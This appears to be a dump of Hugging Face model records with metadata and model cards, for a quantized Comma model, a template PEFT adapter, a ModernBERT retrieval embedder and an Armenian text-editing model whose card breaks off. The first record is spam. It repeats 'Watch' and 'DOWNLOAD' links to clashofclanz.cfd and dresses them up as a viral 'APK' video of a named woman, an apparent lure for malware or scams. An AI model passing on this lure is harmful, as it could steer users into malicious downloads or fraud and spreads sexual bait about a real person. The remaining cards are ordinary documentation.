2025-06-11T10:55:08Z
0
0
null
[ "region:us" ]
null
2025-06-11T10:51:18Z
FULL.APK.SIX.VIRAL.VIDEO.2025.SAH.SAPNA.KUMARI.VIRAL.VIDEO Watch ➤ ➤ ➤ <a href="https://clashofclanz.cfd/vsrftgbet"> Click Here To link (FULL.APK.SIX.VIRAL.VIDEO.2025.SAH.SAPNA.KUMARI.VIRAL.VIDEO) ➤►DOWNLOAD ➤ <a href="https://clashofclanz.cfd/vsrftgbet"> Click Here To link (FULL.APK.SIX.VIRAL.VIDEO.2025.SAH.SAPNA.KUMARI.VIRAL.VIDEO) Watch ➤ ➤ ➤ <a href="https://clashofclanz.cfd/vsrftgbet"> Click Here To link (FULL.APK.SIX.VIRAL.VIDEO.2025.SAH.SAPNA.KUMARI.VIRAL.VIDEO) ➤►DOWNLOAD ➤ <a href="https://clashofclanz.cfd/vsrftgbet"> Click Here To link (FULL.APK.SIX.VIRAL.VIDEO.2025.SAH.SAPNA.KUMARI.VIRAL.VIDEO)
Abstract4700/comma-v0.1-2t-8.0bpw-exl3
Abstract4700
2025-06-11T10:53:33Z
0
0
null
[ "safetensors", "llama", "text-generation", "en", "dataset:common-pile/comma_v0.1_training_dataset", "base_model:common-pile/comma-v0.1-2t", "base_model:quantized:common-pile/comma-v0.1-2t", "license:apache-2.0", "8-bit", "exl3", "region:us" ]
text-generation
2025-06-11T10:38:12Z
--- license: apache-2.0 datasets: - common-pile/comma_v0.1_training_dataset language: - en base_model: - common-pile/comma-v0.1-2t pipeline_tag: text-generation --- ## Model Description Quantization: EXL3, 8.0 bits per weight max_seq_len: 4096 Model Sources Base - **Repository:** https://huggingface.co/common-pile/comma-v0.1-2t Comma v0.1-2T is a 7 billion parameter language model trained on 2 trillion tokens from [the Comma v0.1 dataset](https://huggingface.co/datasets/common-pile/comma_v0.1_training_dataset), comprising of openly licensed text from [the Common Pile](https://huggingface.co/collections/common-pile/common-pile-v01-68307d37df48e36f02717f21). Comma v0.1-2T is a "base model" that can be used a the starting point for finetuning and post-training. ## Citation ```bibtext @article{kandpal2025common, title={{The Common Pile v0.1: An 8TB Dataset of Public Domain and Openly Licensed Text}}, author={Nikhil Kandpal and Brian Lester and Colin Raffel and Sebastian Majstorovic and Stella Biderman and Baber Abbasi and Luca Soldaini and Enrico Shippole and A. Feder Cooper and Aviya Skowron and Shayne Longpre and Lintang Sutawika and Alon Albalak and Zhenlin Xu and Guilherme Penedo and Loubna Ben and Elie Bakouch and John David and Honglu Fan and Dashiell Stander and Guangyu Song and Aaron Gokaslan and John Kirchenbauer and Tom Goldstein and Brian R and Bhavya Kailkhura and Tyler Murray}, journal={arXiv preprint}, year={2025} } ```
frossardr/final_MCQA_qlora-finetuned
frossardr
2025-06-11T10:51:00Z
0
0
peft
[ "peft", "safetensors", "arxiv:1910.09700", "base_model:frossardr/final_model_MCQA", "base_model:adapter:frossardr/final_model_MCQA", "region:us" ]
null
2025-06-11T10:11:16Z
--- base_model: frossardr/final_model_MCQA library_name: peft --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed] ### Framework versions - PEFT 0.15.2
kokolamba/ModernBERT-base-DPR-8e-05-CMNRL-bs512
kokolamba
2025-06-11T10:49:54Z
0
0
sentence-transformers
[ "sentence-transformers", "safetensors", "modernbert", "sentence-similarity", "feature-extraction", "generated_from_trainer", "dataset_size:1250000", "loss:CachedMultipleNegativesRankingLoss", "en", "dataset:sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1", "arxiv:1908.10084", "arxiv:2101.06983", "base_model:answerdotai/ModernBERT-base", "base_model:finetune:answerdotai/ModernBERT-base", "model-index", "autotrain_compatible", "endpoints_compatible", "region:us" ]
sentence-similarity
2025-06-11T10:49:38Z
--- language: - en tags: - sentence-transformers - sentence-similarity - feature-extraction - generated_from_trainer - dataset_size:1250000 - loss:CachedMultipleNegativesRankingLoss base_model: answerdotai/ModernBERT-base widget: - source_sentence: what county is lyndhurst, ohio in sentences: - This article is about the song written by Kenneth Gamble, Leon Huff and Cary Gilbert. For the Tina Turner song, see Don't Leave Me This Way (Tina Turner song). Don't Leave Me This Way is a song written by Kenneth Gamble, Leon Huff and Cary Gilbert. First charting as a hit for Harold Melvin & the Blue Notes featuring Teddy Pendergrass, an act on Gamble & Huff's Philadelphia International label in 1975, Don't Leave Me This Way was later a huge disco hit for Motown artist Thelma Houston in 1977. - "Lyndhurst is a city in Cuyahoga County, Ohio, United States. The population was\ \ 14,001 at the 2010 census. Lyndhurst is located in northeastern Ohio, and is\ \ a suburb of Cleveland. A small part of Lyndhurst was originally part of Mayfield\ \ Township. It used to be called Euclidville before Lyndhurst was chosen. Lyndhurst\ \ is located at 41°31â\x80²17â\x80³N 81°29â\x80²25â\x80³W / 41.52139°N 81.49028°W\ \ / 41.52139; -81.49028 (41.521352, -81.490141)." - Welcome to Trumbull County... Trumbull County, the county seat, located in Warren, Ohio, consists of a combination of both urban and rural communities situated in the northeast corner of Ohio. It is situated roughly between the Youngstown, Cleveland and Akron corridors. - source_sentence: who founded the american graphophone company sentences: - In 1886, Graham Bell and Charles Sumner Tainter founded the American Graphophone Company to distribute and sell graphophones in the US and Canada under license from the Volta Graphophone Company. In 1890, the American Graphophone Company stopped production of new phonographs due to sagging orders. - ShelfGenie How much does a ShelfGenie franchise cost? ShelfGenie has a franchise fee of up to $45,000, with a total initial investment range of $70,100 to $107,750. Local ShelfGenie franchise opportunities. ShelfGenie is looking to grow in a number of cities around the country. To find out if there's a franchise opportunity in your city, unlock more information. - "A+E Networks. The technology that made the modern music business possible came\ \ into existence in the New Jersey laboratory where Thomas Alva Edison created\ \ the first device to both record sound and play it back. He was awarded U.S.\ \ Patent No. 200,521 for his inventionâ\x80\x93the phonographâ\x80\x93on this\ \ day in 1878." - source_sentence: is housekeeping camp flooded? sentences: - 'What is the importance of housekeeping at work? A: Workplace housekeeping promotes sanitation, safety, organization and productivity. It also boosts morale. Daily housekeeping maintenance keeps the workplac... Full Answer >' - The back patio area of a cabin is partially submerged in flood water at Housekeeping Camp on Monday, Jan. 9, 2017, in Yosemite National Park. The Merced River, swollen with storm runoff, crested at 12.7 feet at 4 a.m. SILVIA FLORES [email protected]. - "1 Bake for 8 minutes, then rotate the pan and check the underside of the bagels.\ \ 2 If theyâ\x80\x99re getting too dark, place another pan under the baking sheet.\ \ ( 3 Doubling the pan will insulate the first baking sheet.) Bake for another\ \ 8 to 12 minutes, until the bagels are a golden brown. 4 13." - source_sentence: causes for infection in the nerve of tooth sentences: - If a cavity is causing the toothache, your dentist will fill the cavity or possibly extract the tooth, if necessary. A root canal might be needed if the cause of the toothache is determined to be an infection of the tooth's nerve. Bacteria that have worked their way into the inner aspects of the tooth cause such an infection. An antibiotic may be prescribed if there is fever or swelling of the jaw. - "According to Article III, Section 1 of the Constitution, judges and justices\ \ of the Judicial Branch serve during good behavior.. This means they are appointed\ \ for life, unles â\x80¦ s they are impeached and removed from office. + 50 others\ \ found this useful.he term length for members of the House are two years and\ \ a staggering six years for members of the Senate." - Inflamed or infected pulp (pulpitis) most often causes a toothache. To relieve the pain and prevent further complications, the tooth may be extracted (surgically removed) or saved by root canal treatment. - source_sentence: what county is hayden in sentences: - Normally, the Lead Agency is the agency with general governmental powers such as a city or a county. Agencies with limited powers or districts that provide a public service/utility such as a recreation and park district will tend to be a Responsible Agency. - According to the United States Census Bureau, the city has a total area of 9.61 square miles (24.89 km2), of which 9.60 square miles (24.86 km2) is land and 0.01 square miles (0.03 km2) is water. It lies at the southwestern end of Hayden Lake, and the elevation of the city is 2,287 feet (697 m) above sea level. Hayden is located on U.S. Route 95 at the junction of Route 41. It is also four miles (6 km) north of Interstate 90 and Coeur d'Alene. The Coeur d'Alene airport is northwest of Hayden. - Hayden is a city in Kootenai County, Idaho, United States. Located in the northern portion of the state, just north of Coeur d'Alene, its population was 13,294 at the 2010 census. datasets: - sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1 pipeline_tag: sentence-similarity library_name: sentence-transformers metrics: - cosine_accuracy model-index: - name: SentenceTransformer based on answerdotai/ModernBERT-base results: - task: type: triplet name: Triplet dataset: name: msmarco co condenser dev type: msmarco-co-condenser-dev metrics: - type: cosine_accuracy value: 0.9879999756813049 name: Cosine Accuracy --- # SentenceTransformer based on answerdotai/ModernBERT-base This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [answerdotai/ModernBERT-base](https://huggingface.co/answerdotai/ModernBERT-base) on the [msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more. ## Model Details ### Model Description - **Model Type:** Sentence Transformer - **Base model:** [answerdotai/ModernBERT-base](https://huggingface.co/answerdotai/ModernBERT-base) <!-- at revision 8949b909ec900327062f0ebf497f51aef5e6f0c8 --> - **Maximum Sequence Length:** 8192 tokens - **Output Dimensionality:** 768 dimensions - **Similarity Function:** Cosine Similarity - **Training Dataset:** - [msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1) - **Language:** en <!-- - **License:** Unknown --> ### Model Sources - **Documentation:** [Sentence Transformers Documentation](https://sbert.net) - **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers) - **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers) ### Full Model Architecture ``` SentenceTransformer( (0): Transformer({'max_seq_length': 8192, 'do_lower_case': False}) with Transformer model: ModernBertModel (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True}) ) ``` ## Usage ### Direct Usage (Sentence Transformers) First install the Sentence Transformers library: ```bash pip install -U sentence-transformers ``` Then you can load this model and run inference. ```python from sentence_transformers import SentenceTransformer # Download from the 🤗 Hub model = SentenceTransformer("kokolamba/ModernBERT-base-DPR-8e-05-CMNRL-bs512") # Run inference sentences = [ 'what county is hayden in', "Hayden is a city in Kootenai County, Idaho, United States. Located in the northern portion of the state, just north of Coeur d'Alene, its population was 13,294 at the 2010 census.", "According to the United States Census Bureau, the city has a total area of 9.61 square miles (24.89 km2), of which 9.60 square miles (24.86 km2) is land and 0.01 square miles (0.03 km2) is water. It lies at the southwestern end of Hayden Lake, and the elevation of the city is 2,287 feet (697 m) above sea level. Hayden is located on U.S. Route 95 at the junction of Route 41. It is also four miles (6 km) north of Interstate 90 and Coeur d'Alene. The Coeur d'Alene airport is northwest of Hayden.", ] embeddings = model.encode(sentences) print(embeddings.shape) # [3, 768] # Get the similarity scores for the embeddings similarities = model.similarity(embeddings, embeddings) print(similarities.shape) # [3, 3] ``` <!-- ### Direct Usage (Transformers) <details><summary>Click to see the direct usage in Transformers</summary> </details> --> <!-- ### Downstream Usage (Sentence Transformers) You can finetune this model on your own dataset. <details><summary>Click to expand</summary> </details> --> <!-- ### Out-of-Scope Use *List how the model may foreseeably be misused and address what users ought not to do with the model.* --> ## Evaluation ### Metrics #### Triplet * Dataset: `msmarco-co-condenser-dev` * Evaluated with [<code>TripletEvaluator</code>](https://sbert.net/docs/package_reference/sentence_transformer/evaluation.html#sentence_transformers.evaluation.TripletEvaluator) | Metric | Value | |:--------------------|:----------| | **cosine_accuracy** | **0.988** | <!-- ## Bias, Risks and Limitations *What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.* --> <!-- ### Recommendations *What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.* --> ## Training Details ### Training Dataset #### msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1 * Dataset: [msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1) at [84ed2d3](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1/tree/84ed2d35626f617d890bd493b4d6db69a741e0e2) * Size: 1,250,000 training samples * Columns: <code>query</code>, <code>positive</code>, and <code>negative</code> * Approximate statistics based on the first 1000 samples: | | query | positive | negative | |:--------|:---------------------------------------------------------------------------------|:------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------| | type | string | string | string | | details | <ul><li>min: 4 tokens</li><li>mean: 9.26 tokens</li><li>max: 34 tokens</li></ul> | <ul><li>min: 17 tokens</li><li>mean: 79.14 tokens</li><li>max: 222 tokens</li></ul> | <ul><li>min: 24 tokens</li><li>mean: 80.09 tokens</li><li>max: 436 tokens</li></ul> | * Samples: | query | positive | negative | |:---------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | <code>what is the meaning of menu planning</code> | <code>Menu planning is the selection of a menu for an event. Such as picking out the dinner for your wedding or even a meal at a Birthday Party. Menu planning is when you are preparing a calendar of meals and you have to sit down and decide what meat and veggies you want to serve on each certain day.</code> | <code>Menu Costs. In economics, a menu cost is the cost to a firm resulting from changing its prices. The name stems from the cost of restaurants literally printing new menus, but economists use it to refer to the costs of changing nominal prices in general.</code> | | <code>how old is brett butler</code> | <code>Brett Butler is 59 years old. To be more precise (and nerdy), the current age as of right now is 21564 days or (even more geeky) 517536 hours. That's a lot of hours!</code> | <code>Passed in: St. John's, Newfoundland and Labrador, Canada. Passed on: 16/07/2016. Published in the St. John's Telegram. Passed away suddenly at the Health Sciences Centre surrounded by his loving family, on July 16, 2016 Robert (Bobby) Joseph Butler, age 52 years. Predeceased by his special aunt Geri Murrin and uncle Mike Mchugh; grandparents Joe and Margaret Murrin and Jack and Theresa Butler.</code> | | <code>when was the last navajo treaty sign?</code> | <code>In Executive Session, Senate of the United States, July 25, 1868. Resolved, (two-thirds of the senators present concurring,) That the Senate advise and consent to the ratification of the treaty between the United States and the Navajo Indians, concluded at Fort Sumner, New Mexico, on the first day of June, 1868.</code> | <code>Share Treaty of Greenville. The Treaty of Greenville was signed August 3, 1795, between the United States, represented by Gen. Anthony Wayne, and chiefs of the Indian tribes located in the Northwest Territory, including the Wyandots, Delawares, Shawnees, Ottawas, Miamis, and others.</code> | * Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters: ```json { "scale": 20.0, "similarity_fct": "cos_sim", "mini_batch_size": 16 } ``` ### Evaluation Dataset #### msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1 * Dataset: [msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1) at [84ed2d3](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1/tree/84ed2d35626f617d890bd493b4d6db69a741e0e2) * Size: 1,000 evaluation samples * Columns: <code>query</code>, <code>positive</code>, and <code>negative</code> * Approximate statistics based on the first 1000 samples: | | query | positive | negative | |:--------|:--------------------------------------------------------------------------------|:------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------| | type | string | string | string | | details | <ul><li>min: 4 tokens</li><li>mean: 9.2 tokens</li><li>max: 27 tokens</li></ul> | <ul><li>min: 21 tokens</li><li>mean: 80.44 tokens</li><li>max: 241 tokens</li></ul> | <ul><li>min: 23 tokens</li><li>mean: 80.38 tokens</li><li>max: 239 tokens</li></ul> | * Samples: | query | positive | negative | |:------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | <code>what county is holly springs nc in</code> | <code>Holly Springs, North Carolina. Holly Springs is a town in Wake County, North Carolina, United States. As of the 2010 census, the town population was 24,661, over 2½ times its population in 2000. Contents.</code> | <code>The Mt. Holly Springs Park & Resort. One of the numerous trolley routes that carried people around the county at the turn of the century was the Carlisle & Mt. Holly Railway Company. The “Holly Trolley” as it came to be known was put into service by Patricio Russo and made its first run on May 14, 1901.</code> | | <code>how long does nyquil stay in your system</code> | <code>In order to understand exactly how long Nyquil lasts, it is absolutely vital to learn about the various ingredients in the drug. One of the ingredients found in Nyquil is Doxylamine, which is an antihistamine. This specific medication has a biological half-life or 6 to 12 hours. With this in mind, it is possible for the drug to remain in the system for a period of 12 to 24 hours. It should be known that the specifics will depend on a wide variety of different factors, including your age and metabolism.</code> | <code>I confirmed that NyQuil is about 10% alcohol, a higher content than most domestic beers. When I asked about the relatively high proof, I was told that the alcohol dilutes the active ingredients. The alcohol free version is there for customers with addiction issues.. also found that in that version there is twice the amount of DXM. When I asked if I could speak to a chemist or scientist, I was told they didn't have anyone who fit that description there. It’s been eight years since I kicked NyQuil. I've been sober from alcohol for four years.</code> | | <code>what are mineral water</code> | <code>1 Mineral water – water from a mineral spring that contains various minerals, such as salts and sulfur compounds. 2 It comes from a source tapped at one or more bore holes or spring, and originates from a geologically and physically protected underground water source. Mineral water – water from a mineral spring that contains various minerals, such as salts and sulfur compounds. 2 It comes from a source tapped at one or more bore holes or spring, and originates from a geologically and physically protected underground water source.</code> | <code>Minerals for Your Body. Drinking mineral water is beneficial to health and well-being. But it is not only the amount of water you drink that is important-what the water contains is even more essential.inerals for Your Body. Drinking mineral water is beneficial to health and well-being. But it is not only the amount of water you drink that is important-what the water contains is even more essential.</code> | * Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters: ```json { "scale": 20.0, "similarity_fct": "cos_sim", "mini_batch_size": 16 } ``` ### Training Hyperparameters #### Non-Default Hyperparameters - `per_device_train_batch_size`: 512 - `per_device_eval_batch_size`: 512 - `learning_rate`: 8e-05 - `num_train_epochs`: 1 - `warmup_ratio`: 0.05 - `bf16`: True - `batch_sampler`: no_duplicates #### All Hyperparameters <details><summary>Click to expand</summary> - `overwrite_output_dir`: False - `do_predict`: False - `eval_strategy`: no - `prediction_loss_only`: True - `per_device_train_batch_size`: 512 - `per_device_eval_batch_size`: 512 - `per_gpu_train_batch_size`: None - `per_gpu_eval_batch_size`: None - `gradient_accumulation_steps`: 1 - `eval_accumulation_steps`: None - `torch_empty_cache_steps`: None - `learning_rate`: 8e-05 - `weight_decay`: 0.0 - `adam_beta1`: 0.9 - `adam_beta2`: 0.999 - `adam_epsilon`: 1e-08 - `max_grad_norm`: 1.0 - `num_train_epochs`: 1 - `max_steps`: -1 - `lr_scheduler_type`: linear - `lr_scheduler_kwargs`: {} - `warmup_ratio`: 0.05 - `warmup_steps`: 0 - `log_level`: passive - `log_level_replica`: warning - `log_on_each_node`: True - `logging_nan_inf_filter`: True - `save_safetensors`: True - `save_on_each_node`: False - `save_only_model`: False - `restore_callback_states_from_checkpoint`: False - `no_cuda`: False - `use_cpu`: False - `use_mps_device`: False - `seed`: 42 - `data_seed`: None - `jit_mode_eval`: False - `use_ipex`: False - `bf16`: True - `fp16`: False - `fp16_opt_level`: O1 - `half_precision_backend`: auto - `bf16_full_eval`: False - `fp16_full_eval`: False - `tf32`: None - `local_rank`: 0 - `ddp_backend`: None - `tpu_num_cores`: None - `tpu_metrics_debug`: False - `debug`: [] - `dataloader_drop_last`: False - `dataloader_num_workers`: 0 - `dataloader_prefetch_factor`: None - `past_index`: -1 - `disable_tqdm`: False - `remove_unused_columns`: True - `label_names`: None - `load_best_model_at_end`: False - `ignore_data_skip`: False - `fsdp`: [] - `fsdp_min_num_params`: 0 - `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False} - `fsdp_transformer_layer_cls_to_wrap`: None - `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None} - `deepspeed`: None - `label_smoothing_factor`: 0.0 - `optim`: adamw_torch - `optim_args`: None - `adafactor`: False - `group_by_length`: False - `length_column_name`: length - `ddp_find_unused_parameters`: None - `ddp_bucket_cap_mb`: None - `ddp_broadcast_buffers`: False - `dataloader_pin_memory`: True - `dataloader_persistent_workers`: False - `skip_memory_metrics`: True - `use_legacy_prediction_loop`: False - `push_to_hub`: False - `resume_from_checkpoint`: None - `hub_model_id`: None - `hub_strategy`: every_save - `hub_private_repo`: None - `hub_always_push`: False - `gradient_checkpointing`: False - `gradient_checkpointing_kwargs`: None - `include_inputs_for_metrics`: False - `include_for_metrics`: [] - `eval_do_concat_batches`: True - `fp16_backend`: auto - `push_to_hub_model_id`: None - `push_to_hub_organization`: None - `mp_parameters`: - `auto_find_batch_size`: False - `full_determinism`: False - `torchdynamo`: None - `ray_scope`: last - `ddp_timeout`: 1800 - `torch_compile`: False - `torch_compile_backend`: None - `torch_compile_mode`: None - `include_tokens_per_second`: False - `include_num_input_tokens_seen`: False - `neftune_noise_alpha`: None - `optim_target_modules`: None - `batch_eval_metrics`: False - `eval_on_start`: False - `use_liger_kernel`: False - `eval_use_gather_object`: False - `average_tokens_across_devices`: False - `prompts`: None - `batch_sampler`: no_duplicates - `multi_dataset_batch_sampler`: proportional </details> ### Training Logs | Epoch | Step | Training Loss | msmarco-co-condenser-dev_cosine_accuracy | |:------:|:----:|:-------------:|:----------------------------------------:| | -1 | -1 | - | 0.6060 | | 0.2048 | 500 | 0.6461 | - | | 0.4095 | 1000 | 0.1478 | - | | 0.6143 | 1500 | 0.1107 | - | | 0.8190 | 2000 | 0.0906 | - | | -1 | -1 | - | 0.9880 | ### Framework Versions - Python: 3.10.12 - Sentence Transformers: 4.1.0 - Transformers: 4.52.4 - PyTorch: 2.6.0+cu124 - Accelerate: 1.7.0 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citation ### BibTeX #### Sentence Transformers ```bibtex @inproceedings{reimers-2019-sentence-bert, title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks", author = "Reimers, Nils and Gurevych, Iryna", booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing", month = "11", year = "2019", publisher = "Association for Computational Linguistics", url = "https://arxiv.org/abs/1908.10084", } ``` #### CachedMultipleNegativesRankingLoss ```bibtex @misc{gao2021scaling, title={Scaling Deep Contrastive Learning Batch Size under Memory Limited Setup}, author={Luyu Gao and Yunyi Zhang and Jiawei Han and Jamie Callan}, year={2021}, eprint={2101.06983}, archivePrefix={arXiv}, primaryClass={cs.LG} } ``` <!-- ## Glossary *Clearly define terms in order to be accessible across audiences.* --> <!-- ## Model Card Authors *Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.* --> <!-- ## Model Card Contact *Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.* -->
Syntheresis/auto-edit-hy-500m
Syntheresis
2025-06-11T10:48:52Z
0
0
null
[ "hy", "dataset:Syntheresis/SAW-corpus", "license:apache-2.0", "region:us" ]
null
2025-06-10T23:14:22Z
--- license: apache-2.0 datasets: - Syntheresis/SAW-corpus language: - hy --- # Model Card for Model ID This modelcard aims to be a base template for new models. It has been generated using [this raw template](https://github.com/huggingface/huggingface_hub/blob/main/src/huggingface_hub/templates/modelcard_template.md?plain=1). ## Model Details ### Model Description auto-edit-hy-500m is a specialized model for auto-editing Armenian (hy) text, using the AutoEditForConditionalGeneration architecture from the hy-models library. With approximately 500M parameters, it processes Armenian text to correct errors, ensuring clarity and accuracy across various contexts. The model was trained on a synthetic dataset created from the SAW-corpus, incorporating diverse error patterns to support robust auto-editing capabilities for Armenian NLP. It supports text with Markdown formatting, including lists and tables. - **Developed by:** MMinasyan (https://github.com/MMinasyan) - **Model type:** text-to-text - **Language(s) (NLP):** Armenian (hy) - **License:** Apache-2.0 ### Model Sources [optional] - **Repository:** [[More Information Needed]](https://github.com/MMinasyan/hy-models) ## Uses ### Direct Use The model is intended for direct use in auto-editing Armenian text, correcting errors to improve clarity, accuracy, and overall quality. ### Out-of-Scope Use - Use with non-Armenian languages. - Tasks beyond auto-editing, such as general language modeling or translation. ## Bias, Risks, and Limitations - Limited to Armenian text, with no support for other languages. - No evaluation metrics are available due to the lack of comparable Armenian auto-editing models. ### Recommendations Users should test the model on their specific use cases to ensure it meets their needs. ## How to Get Started with the Model ```python import torch from transformers import AutoTokenizer from hy_models import AutoEditForConditionalGeneration # Install hy-models: pip install git+https://github.com/MMinasyan/hy-models tokenizer = AutoTokenizer.from_pretrained("Syntheresis/auto-edit-hy-500m") model = AutoEditForConditionalGeneration.from_pretrained("Syntheresis/auto-edit-hy-500m").to("cuda") # Auto-edit random morqur's youtube comment input_text = "շատ գրագետ խոսումեք: բայց փաստն այնե որ գողությունը ավելացելա հետեվաբար, ձեր խոսոլը զրոե պեքե աշխատել" inputs = tokenizer([input_text], return_tensors="pt").to("cuda") outputs = model.generate(**inputs) output_text = tokenizer.decode(outputs[0], skip_special_tokens=True) print(output_text) # Շատ գրագետ խոսում եք, բայց փաստն այն է, որ գողությունը ավելացել է, հետեւաբար, ձեր խոսելը զրո է, պետք է աշխատել ``` ## Training Details ### Training Data The model was trained on a synthetic dataset derived from the SAW-corpus (https://huggingface.co/datasets/Syntheresis/SAW-corpus). The synthetic dataset was created by: - Regenerating masked sequences with token-level and character-level generative models. - Applying back-translation with open-source machine-translation models for text variety. - Introducing random grammatical errors with over 500 grammatical mistake patterns. ### Training Procedure #### Training Hyperparameters - **Training regime:** Training regime: Mixed precision bf16, batch size increasing from 36,864 to 147,456, ~500,000 steps, with warmup and CosineAnnealing at a peak learning rate of 0.0001. ## Technical Specifications ### Model Architecture and Objective - Architecture: Text-to-text model with cross-attention, pre-norm, Rotary Position Embeddings (RePE), and Grouped-Query Attention (GQA). - Objective: Auto-editing Armenian text to correct errors and improve quality. ### Compute 